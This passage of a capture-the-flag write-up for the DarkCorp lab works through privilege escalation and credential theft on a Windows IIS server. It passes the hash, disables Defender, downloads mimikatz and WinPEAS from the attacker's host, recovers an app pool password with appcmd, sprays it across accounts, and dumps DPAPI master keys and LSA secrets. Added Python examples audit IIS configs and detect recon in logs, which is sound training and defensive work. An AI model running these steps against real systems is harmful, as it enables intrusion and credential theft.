 0010   9D 3D 3F 74 82 AF 75 33  FD 74 61 6E B7 24 55 AF   .=?t..u3.tan.$U.
 0020   6F 61 A0 BC 2B 2A 86 CF  6E EC E0 D3 37 98 FE E5   oa..+*..n...7...
 0030   14 54 7D A9 A6 45 19 37  F1 20 24 4B 18 43 19 72   .T}..E.7. $K.C.r
NL$KM:ddc92114b923691bd8befd576b3c3ee19d3d3f7482af7533fd74616eb72455af6f61a0bc2b2a86cf6eece0d33798fee514547da9a6451937f120244b18431972
[*] Cleaning up...
[*] Stopping service RemoteRegistry

└─$ proxychains -q evil-winrm -u 'Administrator' -H '88d84ec08dad123eb04a060a74053f21' -i web-01.darkcorp.htb

User.txt

*Evil-WinRM* PS C:\Users\Administrator>tree /f /a
Folder PATH listing
Volume serial number is E2B2-45D5
C:.
|   HTB-Stability.exe
+---3D Objects
+---Contacts
+---Desktop
|       user.txt
+---Documents
|   +---cleanup
|   |       cleanup.ps1
|   \---WindowsPowerShell
|       \---Scripts
|           \---InstalledScriptInfos
+---Downloads
+---Favorites
+---Links
+---Music
+---Pictures
+---Saved Games
+---Searches
\---Videos
*Evil-WinRM* PS C:\Users\Administrator> cat Desktop/user.txt
9d64eebf389ef7e61b4ca459a121269c

Privilege Escalation (john.w)


When escalating the defender was disabled, and after some time it was not. Probably HTB players disabled it to avoid it deleting files.

Use the following to disable it:

*Evil-WinRM* PS C:\Users\Administrator\Music> Set-MpPreference -DisableRealtimeMonitoring $true

Upload WinPeas

*Evil-WinRM* PS C:\Users\Administrator\Music> curl.exe 10.10.14.130/wp.exe -O
*Evil-WinRM* PS C:\Users\Administrator\Music> .\wp.exe | tee -filepath wp.log # Kept crashing (?)
*Evil-WinRM* PS C:\Users\Administrator\Music> .\wp.exe systeminfo userinfo
╔══════════╣ PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.20348.1
    PowerShell Core Version:
    Transcription Settings:
    Module Logging Settings:
    Scriptblock Logging Settings:
    PS history file: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
    PS history size: 6B

appcmd

There are some IIS config files I have not seen yet.

*Evil-WinRM* PS C:\inetpub\history> tree /f /a
Folder PATH listing
Volume serial number is E2B2-45D5
C:.
+---CFGHISTORY_0000000001
|       administration.config
|       applicationHost.config
|
+---CFGHISTORY_0000000002
|       administration.config
|       applicationHost.config
|
+---CFGHISTORY_0000000003
|       administration.config
|       applicationHost.config
|
+---CFGHISTORY_0000000004
|       administration.config
|       applicationHost.config
|
\---CFGHISTORY_0000000005
        administration.config
        applicationHost.config
*Evil-WinRM* PS C:\inetpub\history> cat */*.config | sls pass
<processModel identityType="SpecificUser" userName="darkcorp\svc_acc"
password="[enc:IISWASOnlyCngProvider:ZCCsQ1twCWUKbeL4LsB79sZ2R/BuZBLaPpd4Y+3YjssX74omCfo3IwMPBKK59P7zXm578vFguUoQ3kUQSw2aWMt+c8LHnsUc1VIkFoHZvXESnvbBklSKBvEvpEjlJ6XZv0JQLknMHg+byBnlGoFhgQ==:enc]" />
<processModel identityType="SpecificUser" userName="darkcorp\svc_acc"
password="[enc:IISWASOnlyCngProvider:ZCCsQ1twCWUKbeL4LsB79sZ2R/BuZBLaPpd4Y+3YjssX74omCfo3IwMPBKK59P7zXm578vFguUoQ3kUQSw2aWMt+c8LHnsUc1VIkFoHZvXESnvbBklSKBvEvpEjlJ6XZv0JQLknMHg+byBnlGoFhgQ==:enc]" />

https://www.netspi.com/blog/technical-blog/network-pentesting/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/

*Evil-WinRM* PS C:\inetpub\history> C:\Windows\System32\inetsrv\appcmd.exe list apppools
APPPOOL "DefaultAppPool" (MgdVersion:v4.0,MgdMode:Integrated,state:Started)
APPPOOL ".NET v4.5 Classic" (MgdVersion:v4.0,MgdMode:Classic,state:Started)
APPPOOL ".NET v4.5" (MgdVersion:v4.0,MgdMode:Integrated,state:Started)
*Evil-WinRM* PS C:\inetpub\history> C:\Windows\System32\inetsrv\appcmd.exe list apppools DefaultAppPool /text:* | sls 'username|password'
      userName:"darkcorp\svc_acc"
      password:"VeteranLimitedCookies6!"

*Evil-WinRM* PS C:\inetpub\history> C:\Windows\System32\inetsrv\appcmd.exe list apppools '.NET v4.5 Classic' /text:* | sls 'username|password'
      userName:""
      password:""

*Evil-WinRM* PS C:\inetpub\history> C:\Windows\System32\inetsrv\appcmd.exe list apppools '.NET v4.5' /text:* | sls 'username|password'
      userName:""
      password:""
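Added example, not from the writeup: the applicationHost.config audit a defender would run to find pools configured with `identityType="SpecificUser"`. The `[enc:IISWASOnlyCngProvider:...:enc]` value is reversible by any local administrator through appcmd, exactly as the output above shows, so a domain account configured this way is effectively stored in clear on the web server. The XML below is a constructed sample shaped like the real file, with a placeholder in place of the encrypted blob.

```python
"""
Audit IIS applicationHost.config for application pools that run as a specific
(domain) user and therefore keep a recoverable credential on the host.
SAMPLE_APPHOST is constructed; point audit_app_pools() at the real file's text.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List

SAMPLE_APPHOST = r"""<configuration>
  <system.applicationHost>
    <applicationPools>
      <add name="DefaultAppPool" managedRuntimeVersion="v4.0">
        <processModel identityType="SpecificUser" userName="darkcorp\svc_acc"
                      password="[enc:IISWASOnlyCngProvider:CONSTRUCTED_PLACEHOLDER_BLOB:enc]" />
      </add>
      <add name=".NET v4.5 Classic" managedRuntimeVersion="v4.0" managedPipelineMode="Classic" />
      <add name=".NET v4.5" managedRuntimeVersion="v4.0" />
      <applicationPoolDefaults managedRuntimeVersion="v4.0">
        <processModel identityType="ApplicationPoolIdentity" />
      </applicationPoolDefaults>
    </applicationPools>
  </system.applicationHost>
</configuration>
"""


def audit_app_pools(config_xml: str) -> List[Dict[str, object]]:
    """One entry per pool: effective identity, account name, and whether a credential is stored."""
    root = ET.fromstring(config_xml)
    pools = next(root.iter("applicationPools"))
    # Pools without their own <processModel> inherit applicationPoolDefaults.
    defaults = pools.find("applicationPoolDefaults/processModel")
    default_identity = (defaults.get("identityType") if defaults is not None else None) or "ApplicationPoolIdentity"
    report: List[Dict[str, object]] = []
    for pool in pools.findall("add"):
        pm = pool.find("processModel")
        identity = (pm.get("identityType") if pm is not None else None) or default_identity
        entry: Dict[str, object] = {
            "pool": pool.get("name"),
            "identityType": identity,
            "userName": pm.get("userName") if pm is not None else None,
            "stored_credential": False,
        }
        if identity == "SpecificUser":
            pw = pm.get("password", "") if pm is not None else ""
            entry["stored_credential"] = bool(pw)
            # [enc:...:enc] is machine-local obfuscation, not a secret a local admin lacks.
            entry["encrypted_at_rest"] = pw.startswith("[enc:") and pw.endswith(":enc]")
        report.append(entry)
    return report


def pools_running_as_user(config_xml: str) -> List[str]:
    """Names of pools whose credential a local admin could recover with appcmd."""
    return [str(e["pool"]) for e in audit_app_pools(config_xml) if e["identityType"] == "SpecificUser"]


if __name__ == "__main__":
    for entry in audit_app_pools(SAMPLE_APPHOST):
        print(entry)
    print("review:", pools_running_as_user(SAMPLE_APPHOST))
```

Run it over `%windir%\System32\inetsrv\config\applicationHost.config` and over every copy under `C:\inetpub\history`, since the history folder keeps old revisions with the credential still in them, as seen above. The fix is to run the pool as the built-in ApplicationPoolIdentity or as a group managed service account so that no reusable password lives on the web server at all.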

Password Reuse (Attempt)

We can log in as svc_acc, but since it's only a member of DnsAdmins there's not much we can do.

└─$ proxychains -q netexec smb dc-01.darkcorp.htb -u users.txt -p 'VeteranLimitedCookies6!' --continue-on-success
SMB         224.0.0.1       445    DC-01            [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:False)
SMB         224.0.0.1       445    DC-01            [-] darkcorp.htb\Administrator:VeteranLimitedCookies6! STATUS_LOGON_FAILURE
SMB         224.0.0.1       445    DC-01            [-] darkcorp.htb\Guest:VeteranLimitedCookies6! STATUS_LOGON_FAILURE
SMB         224.0.0.1       445    DC-01            [-] darkcorp.htb\krbtgt:VeteranLimitedCookies6! STATUS_LOGON_FAILURE
SMB         224.0.0.1       445    DC-01            [-] darkcorp.htb\DC-01$:VeteranLimitedCookies6! STATUS_LOGON_FAILURE
SMB         224.0.0.1       445    DC-01            [-] darkcorp.htb\victor.r:VeteranLimitedCookies6! STATUS_LOGON_FAILURE
SMB         224.0.0.1       445    DC-01            [+] darkcorp.htb\svc_acc:VeteranLimitedCookies6!
SMB         224.0.0.1       445    DC-01            [-] darkcorp.htb\john.w:VeteranLimitedCookies6! STATUS_LOGON_FAILURE
SMB         224.0.0.1       445    DC-01            [-] darkcorp.htb\angela.w:VeteranLimitedCookies6! STATUS_LOGON_FAILURE
SMB         224.0.0.1       445    DC-01            [-] darkcorp.htb\angela.w.adm:VeteranLimitedCookies6! STATUS_LOGON_FAILURE
SMB         224.0.0.1       445    DC-01            [-] darkcorp.htb\taylor.b:VeteranLimitedCookies6! STATUS_LOGON_FAILURE
SMB         224.0.0.1       445    DC-01            [-] darkcorp.htb\DRIP$:VeteranLimitedCookies6! STATUS_LOGON_FAILURE

*Evil-WinRM* PS C:\inetpub> cat \inetpub\logs\LogFiles\*\*.log | sls pass
...
2025-02-13 16:35:10 172.16.20.2 GET /common/download/resource resource=/profile/../../../../etc/passwd 80 - 172.16.20.3 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.0.0+Safari/537.36 - 404 0 2 16
2025-02-13 16:35:10 172.16.20.2 GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd#/a - 80 - 172.16.20.3 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.0.0+Safari/537.36 - 404 11 0 13
2025-02-13 16:35:10 172.16.20.2 GET /test/pathtraversal/master/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd - 80 - 172.16.20.3 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.0.0+Safari/537.36 - 404 11 0 18
2025-02-13 16:35:10 172.16.20.2 GET /wxjsapi/saveYZJFile fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt 80 - 172.16.20.3 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.0.0+Safari/537.36 - 404 0 2 30
2025-02-13 16:35:10 172.16.20.2 POST /password_change.cgi - 80 - 172.16.20.3 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.0.0+Safari/537.36 http://172.16.20.2 404 0 2 22
2025-02-13 16:35:10 172.16.20.2 GET /eam/vib id=/etc/passwd 80 - 172.16.20.3 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.0.0+Safari/537.36 - 404 0 2 32
2025-02-13 16:35:10 172.16.20.2 GET /backup/auto.php password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php 80 - 172.16.20.3 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/104.0.0.0+Safari/537.36 - 404 0 2 35
2025-02-13 17:13:50 172.16.20.2 GET /.htpasswd - 80 - 172.16.20.3 gobuster/3.6 - 404 0 2 1
2025-02-13 17:13:50 172.16.20.2 GET /.passwd - 80 - 172.16.20.3 gobuster/3.6 - 404 0 2 0
...
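Added example, not part of the writeup: a small detector over IIS W3C log lines (default field set) that makes explicit what the `sls pass` grep above was fishing for and what those hits actually are: path-traversal probes, sensitive-file requests, `file://` fetch attempts and scanner user-agents, summarised per client IP. The sample lines are the ones shown above with the long Mozilla user-agent shortened; the last line is a constructed benign request for contrast.

```python
"""
Classify IIS W3C log lines (default 15-field layout) and summarise recon
attempts per client. SAMPLE_LOG is the writeup's excerpt (user-agent shortened)
plus one constructed benign line.
"""
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import unquote

IIS_FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query", "s-port",
              "cs-username", "c-ip", "cs(User-Agent)", "cs(Referer)", "sc-status",
              "sc-substatus", "sc-win32-status", "time-taken"]

UA = "Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+Chrome/104.0.0.0"
SAMPLE_LOG = [
    f"2025-02-13 16:35:10 172.16.20.2 GET /common/download/resource resource=/profile/../../../../etc/passwd 80 - 172.16.20.3 {UA} - 404 0 2 16",
    f"2025-02-13 16:35:10 172.16.20.2 GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd#/a - 80 - 172.16.20.3 {UA} - 404 11 0 13",
    f"2025-02-13 16:35:10 172.16.20.2 GET /test/pathtraversal/master/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd - 80 - 172.16.20.3 {UA} - 404 11 0 18",
    f"2025-02-13 16:35:10 172.16.20.2 GET /wxjsapi/saveYZJFile fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt 80 - 172.16.20.3 {UA} - 404 0 2 30",
    f"2025-02-13 16:35:10 172.16.20.2 POST /password_change.cgi - 80 - 172.16.20.3 {UA} http://172.16.20.2 404 0 2 22",
    f"2025-02-13 16:35:10 172.16.20.2 GET /eam/vib id=/etc/passwd 80 - 172.16.20.3 {UA} - 404 0 2 32",
    f"2025-02-13 16:35:10 172.16.20.2 GET /backup/auto.php password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php 80 - 172.16.20.3 {UA} - 404 0 2 35",
    "2025-02-13 17:13:50 172.16.20.2 GET /.htpasswd - 80 - 172.16.20.3 gobuster/3.6 - 404 0 2 1",
    "2025-02-13 17:13:50 172.16.20.2 GET /.passwd - 80 - 172.16.20.3 gobuster/3.6 - 404 0 2 0",
    "2025-02-13 17:20:00 172.16.20.2 GET /index.html - 80 - 172.16.20.50 curl/8.5.0 - 200 0 0 4",  # constructed benign line
]

SCANNER_UAS = ("gobuster", "feroxbuster", "dirbuster", "nikto", "sqlmap", "nuclei")
SENSITIVE_PATHS = ("etc/passwd", ".htpasswd", "/.passwd", "win.ini", "web.config")


def parse_iis_line(line: str) -> Optional[Dict[str, str]]:
    """Split one default-format W3C line; IIS writes spaces inside fields as '+'."""
    if line.startswith("#"):  # W3C directive lines (#Fields:, #Date:, ...)
        return None
    parts = line.split(" ")
    if len(parts) != len(IIS_FIELDS):
        return None
    return dict(zip(IIS_FIELDS, parts))


def classify(entry: Dict[str, str]) -> List[str]:
    """Tags describing why a request looks like reconnaissance; empty means benign."""
    # Decode twice so double-encoded sequences (%252e%252e) are caught as well.
    target = unquote(unquote(entry["cs-uri-stem"] + "?" + entry["cs-uri-query"])).lower()
    tags = []
    if "../" in target or "..\\" in target:
        tags.append("path-traversal")
    if any(p in target for p in SENSITIVE_PATHS):
        tags.append("sensitive-file-probe")
    if "file://" in target:
        tags.append("file-scheme-ssrf")
    if any(s in entry["cs(User-Agent)"].lower() for s in SCANNER_UAS):
        tags.append("scanner-ua")
    return tags


def summarize(lines: List[str]) -> Dict[str, Dict[str, int]]:
    """Count flagged requests per client IP and per tag."""
    by_ip: Counter = Counter()
    by_tag: Counter = Counter()
    for line in lines:
        entry = parse_iis_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            by_ip[entry["c-ip"]] += 1
            by_tag.update(tags)
    return {"by_ip": dict(by_ip), "by_tag": dict(by_tag)}


if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```

Every hit above came from 172.16.20.3 within a second, which is the signature of an automated scanner rather than a user; the status codes are all 404, so nothing was served, but the timestamps and source are exactly what an analyst needs to tie the burst to the account and host that drove it.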

Nothing

└─$ proxychains -q netexec smb dc-01.darkcorp.htb -u users.txt -p 'NzbwpQSdbY06Dngnoteo2wdgiekm7j4N' --continue-on-success

There was an exe file in the Administrator's directory we could check out

└─$ impacket-smbserver -smb2support share .
*Evil-WinRM* PS C:\Users\Administrator> xcopy C:\Users\Administrator\HTB-Stability.exe \\10.10.14.130\share

Unfortunately the binary is not written in C# but in Go

└─$ file HTB-Stability.exe
HTB-Stability.exe: PE32+ executable (console) x86-64, for MS Windows, 8 sections

Rabbit hole :/

PS C:\Users\\Desktop> .\HTB-Stability.exe
ATTN: This is not part of the path and only serves as a stability purpose

Update bloodhound data

└─$ proxychains -q bloodhound-python -u 'svc_acc' -p 'VeteranLimitedCookies6!' -d darkcorp.htb -dc dc-01.darkcorp.htb -ns 172.16.20.1 --zip --dns-tcp --dns-timeout 100 -c all -op svc_acc

Nothing new...

Winpeas.bat

The exe didn't work, but the bat version of WinPEAS did

*Evil-WinRM* PS C:\Users\Administrator\Music> curl.exe 10.10.14.130/wp.bat -O
*Evil-WinRM* PS C:\Users\Administrator\Music> cmd /c "C:\Users\Administrator\Music\wp.bat"
 [+] Number of cached creds
   [i] You need System-rights to extract them

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    CACHEDLOGONSCOUNT    REG_SZ    10
 [+] DPAPI MASTER KEYS
   [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt
   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dpapi


    Directory: C:\Users\Administrator\AppData\Roaming\Microsoft\Protect


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d---s-         1/16/2025  10:35 AM                S-1-5-21-2988385993-1727309239-2541228647-500


 [+] DPAPI MASTER KEYS
   [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt
   [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module
   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dpapi

Looking inside C:\Users\Administrator\AppData\Roaming\Microsoft\Credentials\


Looking inside C:\Users\Administrator\AppData\Local\Microsoft\Credentials\

32B2774DF751FF7E28E78AE75C237A1E

 [+] Unattended files

 [+] SAM and SYSTEM backups
C:\Windows\System32\config\RegBack\SAM exists.
C:\Windows\System32\config\SAM exists.
C:\Windows\System32\config\SYSTEM exists.
C:\Windows\System32\config\RegBack\SYSTEM exists.

 [+] AppCmd
   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#appcmdexe
C:\Windows\system32\inetsrv\appcmd.exe exists.

 [+] Files in registry that may contain credentials
   [i] Searching specific files that may contains credentials.
   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials
Looking inside HKCU\Software\ORL\WinVNC3\Password
Looking inside HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4/password
Looking inside HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\WinLogon
    DefaultDomainName    REG_SZ
    DefaultUserName    REG_SZ
Looking inside HKLM\SYSTEM\CurrentControlSet\Services\SNMP

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents
    W3SVC    REG_SZ    Software\Microsoft\W3SVC\CurrentVersion

DPAPI (struggle)

https://github.com/gentilkiwi/mimikatz/wiki/module-~-dpapi
https://tools.thehacker.recipes/mimikatz/modules/dpapi/masterkey

└─$ cp /usr/share/windows-resources/mimikatz/mimikatz.exe mimi.exe
*Evil-WinRM* PS C:\Users\Administrator\Documents> curl.exe 10.10.14.130/mimi.exe -Os
*Evil-WinRM* PS C:\Users\Administrator\Documents> .\mimi.exe "sekurlsa::dpapi" "exit"
...
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WEB-01$
Domain            : darkcorp
Logon Server      : (null)
Logon Time        : 2/14/2025 8:25:03 AM
SID               : S-1-5-18
         [00000000]
         * GUID      :  {b9f97cf8-ab4f-432b-90be-ec2c1313cf01}
         * Time      :  2/14/2025 9:34:06 AM
         * MasterKey :  f2cf7f20366d7f4782685c2524b60f11170455fc09d6200ab4ac0a80d6872e3ad35c1ca53274496872253395c9d9701fbd39081ef9276d229e78f6c52d475635
         * sha1(key) :  053cd32f9169e99ffcca5cc495695762851cd85a
         [00000001]
         * GUID      :  {0398c226-b529-40ce-8f26-9d125bacd246}
         * Time      :  2/14/2025 8:25:10 AM
         * MasterKey :  4d98f653531a0dd73b34aebff0a8ca1a25e592f9823c57bdb7b66f0f3670d535c986b9a8f037d6adc715c9ff162c7efae1695890a618aed6466433982ed495b2
         * sha1(key) :  28d19153a3e41d3a615581ab8e72b55d143c3b5f
         [00000002]
         * GUID      :  {a4ae82ac-1990-4b2a-81de-22f930f5a2a6}
         * Time      :  2/14/2025 8:25:04 AM
         * MasterKey :  290c9657271af35267c866528a5c8acdea4e87f02f4622cf700e0bdbde2313fa05432d000b3c05dbab82171833299a1e1c46fcc1bea4722fa3a3707ae7f9a226
         * sha1(key) :  cfcceeaaaca2ff6d0971b684e7adc9a21fae2858
...

Note: I think the following keys would have worked if I had used token::elevate first, before dpapi::cred, and I also think we were not supposed to see these keys; probably other players...

*Evil-WinRM* PS C:\Users\Administrator\Documents> ls C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-2988385993-1727309239-2541228647-500 -force -rec

    Directory: C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-2988385993-1727309239-2541228647-500

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-         1/15/2025   4:11 PM            468 189c6409-5515-4114-81d2-6dde4d6912ce
-a-hs-         1/16/2025  10:35 AM            468 6037d071-cac5-481e-9e08-c4296c0a7ff7
-a-hs-         1/16/2025  10:35 AM             24 Preferred

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-2988385993-1727309239-2541228647-500
*Evil-WinRM* PS C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-2988385993-1727309239-2541228647-500> C:\Users\Administrator\Documents\mimi.exe "dpapi::masterkey /in:.\189c6409-5515-4114-81d2-6dde4d6912ce /rpc" "exit"
...
*Evil-WinRM* PS C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-2988385993-1727309239-2541228647-500> C:\Users\Administrator\Documents\mimi.exe "dpapi::masterkey /in:.\6037d071-cac5-481e-9e08-c4296c0a7ff7 /rpc" "exit"
...
*Evil-WinRM* PS C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\S-1-5-21-2988385993-1727309239-2541228647-500> C:\Users\Administrator\Documents\mimi.exe "dpapi::cache" "exit"
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
mimikatz(commandline) # dpapi::cache
CREDENTIALS cache
=================
MASTERKEYS cache
================
DOMAINKEYS cache
================

*Evil-WinRM* PS C:\Users\Administrator\Documents> .\mimi.exe "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\32B2774DF751FF7E28E78AE75C237A1E /masterkey:f2cf7f20366d7f4782685c2524b60f11170455fc09d6200ab4ac0a80d6872e3ad35c1ca53274496872253395c9d9701fbd39081ef9276d229e78f6c52d475635" "exit"
...
Decrypting Credential:
 * masterkey     : f2cf7f20366d7f4782685c2524b60f11170455fc09d6200ab4ac0a80d6872e3ad35c1ca53274496872253395c9d9701fbd39081ef9276d229e78f6c52d475635
ERROR kull_m_dpapi_unprotect_blob ; kull_m_crypto_hkey_session (0x00000005)
...
*Evil-WinRM* PS C:\Users\Administrator\Documents> .\mimi.exe "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\32B2774DF751FF7E28E78AE75C237A1E /masterkey:4d98f653531a0dd73b34aebff0a8ca1a25e592f9823c57bdb7b66f0f3670d535c986b9a8f037d6adc715c9ff162c7efae1695890a618aed6466433982ed495b2" "exit"
...
Decrypting Credential:
 * masterkey     : 4d98f653531a0dd73b34aebff0a8ca1a25e592f9823c57bdb7b66f0f3670d535c986b9a8f037d6adc715c9ff162c7efae1695890a618aed6466433982ed495b2
ERROR kull_m_dpapi_unprotect_blob ; kull_m_crypto_hkey_session (0x00000005)
...
*Evil-WinRM* PS C:\Users\Administrator\Documents> .\mimi.exe "dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\32B2774DF751FF7E28E78AE75C237A1E /masterkey:290c9657271af35267c866528a5c8acdea4e87f02f4622cf700e0bdbde2313fa05432d000b3c05dbab82171833299a1e1c46fcc1bea4722fa3a3707ae7f9a226" "exit"
Decrypting Credential:
 * masterkey     : 290c9657271af35267c866528a5c8acdea4e87f02f4622cf700e0bdbde2313fa05432d000b3c05dbab82171833299a1e1c46fcc1bea4722fa3a3707ae7f9a226
ERROR kull_m_dpapi_unprotect_blob ; kull_m_crypto_hkey_session (0x00000005)
...

The /rpc attempts fail because that option asks the DC to unwrap the master key with the domain backup key, and the Administrator here is a local WEB-01 account (S-1-5-21-2988385993-...-500) the DC knows nothing about; dpapi::cache stays empty. The three master keys tried against the 32B2774DF751FF7E28E78AE75C237A1E blob are simply not the ones protecting it, hence the kull_m_crypto_hkey_session errors. There are two sets of master keys on the box: the Administrator's under the user profile and SYSTEM's (S-1-5-18) under System32:

*Evil-WinRM* PS C:\Users\Administrator\Music> ls -path / -rec -dir -filter Protect -erroraction silent -force | %{$_.FullName}
C:\Users\Administrator\AppData\Roaming\Microsoft\Protect
C:\Windows\System32\Microsoft\Protect
*Evil-WinRM* PS C:\Users\Administrator\Music> ls C:\Windows\System32\Microsoft\Protect -force -rec -file |%{$_.FullName}
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat.LOG1
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat.LOG2
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat{365de4dd-d3e1-11ef-9e28-000c2946d384}.TM.blf
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat{365de4dd-d3e1-11ef-9e28-000c2946d384}.TMContainer00000000000000000001.regtrans-ms
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat{365de4dd-d3e1-11ef-9e28-000c2946d384}.TMContainer00000000000000000002.regtrans-ms
C:\Windows\System32\Microsoft\Protect\S-1-5-18\0398c226-b529-40ce-8f26-9d125bacd246
C:\Windows\System32\Microsoft\Protect\S-1-5-18\37804100-9399-4783-8353-2422ef13aee6
C:\Windows\System32\Microsoft\Protect\S-1-5-18\Preferred
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\a4ae82ac-1990-4b2a-81de-22f930f5a2a6
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\b9f97cf8-ab4f-432b-90be-ec2c1313cf01
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\Diagnostic
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\Preferred

Admin Password

First get DPAPI_SYSTEM from the LSA secrets. It is the machine-wide key that protects the S-1-5-18 master keys (mimikatz prints its machine and user halves as m/u) and it also serves as the local backup key for user master keys: 1004cecdc9b33080d25a4a29126d4590eb555c5f7f3f9f871ea1dafaea01ae4ccf6e3f7ee535e472

*Evil-WinRM* PS C:\Users\Administrator\Music> C:\Users\Administrator\Documents\mimi.exe "token::elevate" "lsadump::secrets" "exit"
...
mimikatz(commandline) # lsadump::secrets
Domain : WEB-01
SysKey : 4cf6d0e998d53752d088e233abb4bed6

Local name : WEB-01 ( S-1-5-21-2988385993-1727309239-2541228647 )
Domain name : darkcorp ( S-1-5-21-3432610366-2163336488-3604236847 )
Domain FQDN : darkcorp.htb

Policy subsystem is : 1.18
LSA Key(s) : 1, default {bf8c7ab1-d9af-7cdf-8c22-3aa6152f2d8c}
  [00] {bf8c7ab1-d9af-7cdf-8c22-3aa6152f2d8c} 3f930625ab8021e47843ffa38e66ba50532ba33ccba2760de40ad91403533aea

Secret  : $MACHINE.ACC
cur/text: ARDl&qrZd"t#a=ORc^knO]'4KA:99tb21j@ZOO\K;vuf!cOu/<r]CLJX%ul-Dd_k88,'I,F@h';E !;BM_d;f#phUDi/T#2"_LVL<Io&Hv,]a4UGwJv_4tTH
    NTLM:8f33c7fc7ff515c1f358e488fbb8b675
    SHA1:3f88a920a1b4f5fadb6a8837de2b408cc45e83fb
old/text: ARDl&qrZd"t#a=ORc^knO]'4KA:99tb21j@ZOO\K;vuf!cOu/<r]CLJX%ul-Dd_k88,'I,F@h';E !;BM_d;f#phUDi/T#2"_LVL<Io&Hv,]a4UGwJv_4tTH
    NTLM:8f33c7fc7ff515c1f358e488fbb8b675
    SHA1:3f88a920a1b4f5fadb6a8837de2b408cc45e83fb

Secret  : DPAPI_SYSTEM
cur/hex : 01 00 00 00 10 04 ce cd c9 b3 30 80 d2 5a 4a 29 12 6d 45 90 eb 55 5c 5f 7f 3f 9f 87 1e a1 da fa ea 01 ae 4c cf 6e 3f 7e e5 35 e4 72
    full: 1004cecdc9b33080d25a4a29126d4590eb555c5f7f3f9f871ea1dafaea01ae4ccf6e3f7ee535e472         # <--- THIS
    m/u : 1004cecdc9b33080d25a4a29126d4590eb555c5f / 7f3f9f871ea1dafaea01ae4ccf6e3f7ee535e472
